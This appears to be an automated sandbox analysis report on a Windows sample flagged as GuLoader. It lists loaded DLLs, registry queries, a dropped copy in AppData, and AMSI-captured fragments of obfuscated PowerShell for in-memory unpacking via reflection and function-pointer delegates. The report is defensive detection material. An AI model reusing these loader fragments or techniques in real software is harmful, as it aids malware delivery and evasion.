Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\87h216Snb7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 87h216Snb7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000007.00000002.1537052858.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdbht9$ source: powershell.exe, 00000007.00000002.1537052858.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000007.00000002.1541477424.0000000008E67000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Throed $Marveled $Overtagets), (Thuggish @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hydrotachymeter = [AppDomain]::CurrentDomain.GetAssemblies()$globa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($heyday)), $Tiggede).DefineDynamicModule($Everyplace198, $false).DefineType($Picturelike, $Turritella, [System.MulticastDelegate])$Segm

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0070E9F9 push eax; mov dword ptr [esp], edx	7_2_0070EA0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_06F774D4 pushfd ; retf	7_2_06F774ED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_06F70FC4 push es; iretd	7_2_06F70FC7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_06F708E2 push ecx; ret	7_2_06F708E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_06F708ED push ecx; ret	7_2_06F708EF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0303891E pushad ; iretd	11_2_0303891F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_03032D49 push 8BFFFFFFh; retf	11_2_03032D4F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_03038DDF push esp; iretd	11_2_03038DE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_03038C2F pushfd ; iretd	11_2_03038C30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_232638AD push eax; retf 0022h	11_2_232638B2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\87h216Snb7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
